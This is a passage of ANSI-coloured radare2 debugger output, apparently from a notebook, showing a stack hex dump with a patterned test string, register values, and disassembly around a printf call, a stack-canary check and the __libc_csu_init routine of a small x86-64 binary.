\u001b[33m69\u001b[0m\u001b[33m6e\u001b[0m 
\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[33mp\u001b[0m\u001b[33me\u001b[0m\u001b[33mn\u001b[0m\u001b[33mg\u001b[0m\u001b[33mu\u001b[0m\u001b[33mi\u001b[0m\u001b[33mn\u001b[0m\n", "\u001b[32m0x7ffcf638f640\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\n", "\u001b[32m0x7ffcf638f650\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f660\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f670\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f680\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f690\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m 
\u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6a0\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37mdc\u001b[0m \u001b[33m7c\u001b[0m\u001b[37mdd\u001b[0m \u001b[32m00\u001b[0m\u001b[37m9c\u001b[0m \u001b[33m64\u001b[0m\u001b[33m5a\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m|\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33md\u001b[0m\u001b[33mZ\u001b[0m\n", "\u001b[32m0x7ffcf638f6b0\u001b[0m \u001b[33m30\u001b[0m\u001b[37m06\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m97\u001b[0m\u001b[37mcb\u001b[0m \u001b[37me3\u001b[0m\u001b[37mc0\u001b[0m \u001b[33m3b\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[33m0\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m;\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", 
"\u001b[32m0x7ffcf638f6c0\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6d0\u001b[0m \u001b[32m00\u001b[0m\u001b[37m80\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37ma7\u001b[0m\u001b[37m05\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f6e0\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37mf0\u001b[0m\u001b[37m9f\u001b[0m \u001b[33m51\u001b[0m\u001b[37m10\u001b[0m \u001b[37mec\u001b[0m\u001b[33m2b\u001b[0m 
\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mQ\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m+\u001b[0m\n", "\u001b[32m0x7ffcf638f6f0\u001b[0m \u001b[37mc0\u001b[0m\u001b[37m04\u001b[0m \u001b[33m40\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m90\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m@\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f700\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f710\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m \u001b[37m10\u001b[0m\u001b[33m7e\u001b[0m \u001b[37ma0\u001b[0m\u001b[37mfc\u001b[0m \u001b[37m15\u001b[0m\u001b[37md4\u001b[0m \u001b[32m00\u001b[0m\u001b[37m03\u001b[0m 
\u001b[37m0e\u001b[0m\u001b[37m05\u001b[0m \u001b[37m16\u001b[0m\u001b[37m91\u001b[0m \u001b[37m9b\u001b[0m\u001b[37md5\u001b[0m \u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m~\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\n", "\n", "\u001b[36mrax = 0x00000000\u001b[0m\n", "rbx = 0x00000000\n", "\u001b[36mrcx = 0x7f3bc0ed28a0\u001b[0m\n", "\u001b[36mrdx = 0x00000000\u001b[0m\n", "\u001b[36mr8 = 0x00000004\u001b[0m\n", "r9 = 0x7f3bc1207d80\n", "\u001b[36mr10 = 0x00000003\u001b[0m\n", "\u001b[36mr11 = 0x7f3bc0fca550\u001b[0m\n", "r12 = 0x004004c0\n", "r13 = 0x7ffcf638f790\n", "r14 = 0x00000000\n", "r15 = 0x00000000\n", "\u001b[36mrsi = 0x00000001\u001b[0m\n", "\u001b[36mrdi = 0x7ffcf638f640\u001b[0m\n", "\u001b[36mrsp = 0x7ffcf638f620\u001b[0m\n", "\u001b[36mrbp = 0x7ffcf638f6b0\u001b[0m\n", "\u001b[36mrip = 0x0040060d\u001b[0m\n", "\u001b[36mrflags = 0x00000203\u001b[0m\n", "orax = 0xffffffffffffffff\n", "\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36mrip:\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[7m\u001b[32m0x0040060d\u001b[0m b \u001b[37me8\u001b[37m9e\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.printf\u001b[0m\u001b[0m\u001b[31m ; int printf(const char *format)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400612\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400617\u001b[0m \u001b[33m48\u001b[37m8b\u001b[33m55\u001b[37mf8\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", 
"\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040061b\u001b[0m \u001b[33m64\u001b[33m48\u001b[33m33\u001b[37m14\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[36mxor\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400624\u001b[0m \u001b[33m74\u001b[37m05\u001b[0m \u001b[32mje 0x40062b\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400626\u001b[0m \u001b[37me8\u001b[33m75\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.__stack_chk_fail\u001b[0m\u001b[0m\u001b[31m ; void __stack_chk_fail(void)\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x0040062b\u001b[0m \u001b[37mc9\u001b[0m \u001b[1;35mleave\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040062c\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x0040062d\u001b[0m \u001b[37m0f\u001b[37m1f\u001b[32m00\u001b[0m \u001b[34mnop dword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.__libc_csu_init\u001b[0m 101\n", "\u001b[36m| \u001b[0m \u001b[31m sym.__libc_csu_init\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004d6 (entry0)\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400630\u001b[0m \u001b[33m41\u001b[33m57\u001b[0m \u001b[35mpush\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400632\u001b[0m \u001b[33m41\u001b[33m56\u001b[0m \u001b[35mpush\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400634\u001b[0m \u001b[33m49\u001b[37m89\u001b[37md7\u001b[0m \u001b[37mmov\u001b[36m r15\u001b[0m,\u001b[36m\u001b[36m 
rdx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400637\u001b[0m \u001b[33m41\u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m r13\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400639\u001b[0m \u001b[33m41\u001b[33m54\u001b[0m \u001b[35mpush\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040063b\u001b[0m \u001b[33m4c\u001b[37m8d\u001b[33m25\u001b[37mce\u001b[37m07\u001b[33m20\u001b[37m.\u001b[0m \u001b[37mlea\u001b[36m r12\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m\u001b[33mobj.__frame_dummy_init_array_entry\u001b[0m\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; loc.__init_array_start\u001b[31m ; 0x600e10\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400642\u001b[0m \u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400643\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m2d\u001b[37mce\u001b[37m07\u001b[33m20\u001b[37m.\u001b[0m \u001b[37mlea\u001b[36m rbp\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m\u001b[33mobj.__do_global_dtors_aux_fini_array_entry\u001b[0m\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; loc.__init_array_end\u001b[31m ; 0x600e18\u001b[31m ; \"p\\x05@\"\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064a\u001b[0m \u001b[33m53\u001b[0m \u001b[35mpush\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064b\u001b[0m \u001b[33m41\u001b[37m89\u001b[37mfd\u001b[0m \u001b[37mmov\u001b[36m r13d\u001b[0m,\u001b[36m\u001b[36m edi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040064e\u001b[0m \u001b[33m49\u001b[37m89\u001b[37mf6\u001b[0m \u001b[37mmov\u001b[36m r14\u001b[0m,\u001b[36m\u001b[36m rsi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400651\u001b[0m 
\u001b[33m4c\u001b[33m29\u001b[37me5\u001b[0m \u001b[33msub\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400654\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mec\u001b[37m08\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400658\u001b[0m \u001b[33m48\u001b[37mc1\u001b[37mfd\u001b[37m03\u001b[0m \u001b[36msar\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m3\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040065c\u001b[0m \u001b[37me8\u001b[31mff\u001b[37mfd\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym._init\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400661\u001b[0m \u001b[33m48\u001b[37m85\u001b[37med\u001b[0m \u001b[36mtest\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400664\u001b[0m \u001b[33m74\u001b[33m20\u001b[0m \u001b[32mje 0x400686\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400666\u001b[0m \u001b[33m31\u001b[37mdb\u001b[0m \u001b[36mxor\u001b[36m ebx\u001b[0m,\u001b[36m\u001b[36m ebx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400668\u001b[0m \u001b[37m0f\u001b[37m1f\u001b[37m84\u001b[32m00\u001b[32m00\u001b[32m00\u001b[37m.\u001b[0m \u001b[34mnop dword \u001b[0m[\u001b[36mrax \u001b[0m+\u001b[36m\u001b[36m rax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m .--> \u001b[0m\u001b[32m0x00400670\u001b[0m \u001b[33m4c\u001b[37m89\u001b[37mfa\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400673\u001b[0m 
\u001b[33m4c\u001b[37m89\u001b[37mf6\u001b[0m \u001b[37mmov\u001b[36m rsi\u001b[0m,\u001b[36m\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400676\u001b[0m \u001b[33m44\u001b[37m89\u001b[37mef\u001b[0m \u001b[37mmov\u001b[36m edi\u001b[0m,\u001b[36m\u001b[36m r13d\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400679\u001b[0m \u001b[33m41\u001b[31mff\u001b[37m14\u001b[37mdc\u001b[0m \u001b[1;32mcall qword [r12 + rbx*8]\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x0040067d\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc3\u001b[37m01\u001b[0m \u001b[33madd\u001b[36m rbx\u001b[0m,\u001b[36m\u001b[36m \u001b[33m1\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[36m:\u001b[36m| \u001b[0m\u001b[32m0x00400681\u001b[0m \u001b[33m48\u001b[33m39\u001b[37mdd\u001b[0m \u001b[36mcmp\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m `==< \u001b[0m\u001b[32m0x00400684\u001b[0m \u001b[33m75\u001b[37mea\u001b[0m \u001b[32mjne 0x400670\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x00400686\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc4\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068a\u001b[0m \u001b[33m5b\u001b[0m \u001b[1;35mpop\u001b[36m rbx\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068b\u001b[0m \u001b[33m5d\u001b[0m \u001b[1;35mpop\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040068c\u001b[0m \u001b[33m41\u001b[33m5c\u001b[0m \u001b[1;35mpop\u001b[36m r12\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m 
\u001b[0m\u001b[32m0x0040068e\u001b[0m \u001b[33m41\u001b[33m5d\u001b[0m \u001b[1;35mpop\u001b[36m r13\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400690\u001b[0m \u001b[33m41\u001b[33m5e\u001b[0m \u001b[1;35mpop\u001b[36m r14\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400692\u001b[0m \u001b[33m41\u001b[33m5f\u001b[0m \u001b[1;35mpop\u001b[36m r15\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400694\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x00400695\u001b[0m \u001b[37m90\u001b[0m \u001b[34mnop\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m\u001b[32m0x00400696\u001b[0m \u001b[33m66\u001b[33m2e\u001b[37m0f\u001b[37m1f\u001b[37m84\u001b[32m00\u001b[37m.\u001b[0m \u001b[34mnop word cs:\u001b[0m[\u001b[36mrax \u001b[0m+\u001b[36m\u001b[36m rax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.__libc_csu_fini\u001b[0m 2\n", "\u001b[36m| \u001b[0m \u001b[31m sym.__libc_csu_fini\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004cf (entry0)\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004006a0\u001b[0m \u001b[37mf3\u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", " \u001b[36m \u001b[0m;-- \u001b[36msection_end..text:\u001b[0m\n", " 